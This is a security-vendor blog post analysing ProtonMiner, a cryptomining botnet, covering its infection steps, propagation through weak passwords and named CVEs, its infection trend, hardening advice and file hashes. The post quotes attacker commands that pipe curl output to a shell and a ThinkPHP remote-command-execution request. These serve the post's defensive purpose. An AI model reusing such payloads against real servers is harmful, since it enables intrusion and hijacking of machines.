Community Blog ProtonMiner Gains Momentum via Expanded Attack Surface

ProtonMiner Gains Momentum via Expanded Attack Surface

The post provides a detailed analysis of ProtonMiner, a new cryptocurrency miner hijacker discovered by Alibaba Cloud, and security recommendations to avoid it.

Security is sometimes a very simple business: if you rely on weak passwords and use root access, there is a high chance that someone will develop a malware to hack your database or web service.

This blog post provides a recent example for this truth: ProtonMiner, a new cryptocurrency miner hijacker discovered by Alibaba Cloud security team, which became extremely active since mid-February 2019. The post provides a clear analysis of the malware - how it infects, how it propagates to additional victims, its impact, and its recent distribution trend; the post also offers security recommendations to avoid it.

Yohai Einav, Principal Security Researcher, Alibaba Cloud Security Innovation Labs


Security researchers at Alibaba Cloud have recently detected an outburst of a new cryptocurrency miner hijacker, which they named "ProtonMiner". This miner was very likely created by the same attacker's group mentioned by TrendMicro in their December 2018 blog post. The botnet initially propagated slowly using several old vulnerabilities in ElasticSearch, yet, since mid-February we saw its popularity grow considerably as it expanded its attack surface.

This blog post provides details on how the botnet propagates itself, as well as our security recommendations for end users to avoid being infected.

Infection Outline


Step 1: The attacker controls the compromised hosts and runs one of following commands to download uuu.sh (or update.sh, which has identical content):

/bin/bash -c curl -fsSL |sh
/bin/bash -c curl -fsSL |sh 

Step 2: The uuu.sh (or update.sh) script downloads three files: a trojan, a miner and a mining configuration file. The miner will mine cryptocurrency on the compromised host, while the trojan will continue to distribute to other uncompromised hosts.

Shell Script from a Stealthy Attacker

The uuu.sh script firstly tries to update /etc/devtools, and test whether the current account has root privilege. Only when it is root the main part of script would execute and mining would start.

echo 1 > /etc/devtools
if [ -f "$rtdir" ]
        echo "i am root"
        echo "goto 1" >> /etc/devtools
 \# download & attack

Other parts of script consist of typical mining botnet behavior: it first detects and kills process of other mining groups, adds itself to crontab, and alters iptables configuration to allow communication on certain ports. However, the attacker seems to be more cautious than other malicious script authors in following aspects:

  1. The attacker cleans up command history after itself:


  2. The attacker uses many different ProtonMail addresses as username in the mining configuration file. ProtonMail is the world's largest secure email service, and we named the botnet ProtonMiner after it. By using secure email addresses instead of Monero wallet address as mining username, the attacker adds difficulty for security researchers to detect the threat, as well as to investigate the mining profits and the scale of compromised hosts from the botnet.


Propagation Method Analysis

The propagation module of ProtonMiner is named "systemctI" and is written in Go language. Its main function is as following:


The trojan first initializes the ip list and weak password list to start the scanning. The initialization is done by requesting and downloading the lists from the following URLs:
https://pixeldra.in/api/download/I9RRye (IP address CIDR blocks)
https://pixeldra.in/api/download/-7A5aP (weak passwords)



After that, it enters the mainScan() function, which contains multiple sub-functions to scan and exploit services.


This is the list of impacted services and corresponding vulnerabilities:

Service Vulnerability
Hadoop Unauthorized access
Drupal CVE-2018-7600
Redis Unauthorized access
Spring Data Commons CVE-2018-1273
SQL Server Weak password
Elastic Search CVE-2014-3120
Weblogic CVE-2017-10271
ThinkPHP Two RCEs(Remote Command Execution) including CVE-2018-20062

For example, here it is a ThinkPHP payload (the infected host name is masked for privacy issue):

POST /index.php?s=captcha HTTP/1.1%0d%0aHost: 47.244.[xxx].xxx=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp:// |sh

Distribution Trend

After extending its attack surface, ProtonMiner's distribution gained momentum, and reached a peak of about one thousand plus infections around mid-February of this year.

Figure 1: Daily distribution of devices infected by ProtonMiner

Security Recommendations

  1. We strongly advise you to NOT run database and web services with root account. Furthermore, services like Redis and Hadoop should not be exposed to public network.
  2. Mining botnets are very quick in updating themselves to contain new vulnerability payloads, and they create ubiquitous threats on the Internet. Alibaba's Cloud Firewall is able to detect, block and protect from these kinds of threats.
  3. If you are concerned about your servers' security, but do not have a security engineer to tell you what to do, you should give Alibaba's Cloud Managed Security Service a try. Alibaba Cloud's Security experts will help you clean up malware, improve configurations, and enhance overall security.


C&C servers:


Filename md5
update.sh ce10c8da626e5c24eab3e2f7e496cb57 (same as uuu.sh)
config.json 26baedfa378af63a2a566a7f672d5276
systemctI 359e7272c933c710476955508d687ad3
devtool 5e6b6fcd7913ae4917b0cdb0f09bf539

Pool address:

Usernames at pool:



0 0 0
Share on

Alibaba Cloud Security

32 posts | 15 followers

You may also like